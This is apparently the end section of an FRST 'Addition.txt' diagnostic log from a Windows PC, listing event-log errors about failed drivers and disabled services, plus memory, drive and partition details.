Error: (03/02/2018 12:09:03 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf
Error: (03/02/2018 12:09:03 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
Error: (03/02/2018 11:13:47 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
Error: (03/02/2018 11:13:47 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{9E175B6D-F52A-11D8-B9A5-505054503030}
==================== Memory info ===========================
Processor: Intel® Core i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 10%
Total physical RAM: 16321.73 MB
Available physical RAM: 14647.89 MB
Total Virtual: 32641.63 MB
Available Virtual: 31499 MB
==================== Drives ================================
Drive c: (Structure) (Fixed) (Total:238.37 GB) (Free:89.17 GB) NTFS
Drive d: (Entertainment) (Fixed) (Total:1863.01 GB) (Free:192.43 GB) NTFS
\\?\Volume{0a950ecd-376b-11e3-98f7-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: 37EB0193)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=238.4 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 37EB0198)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================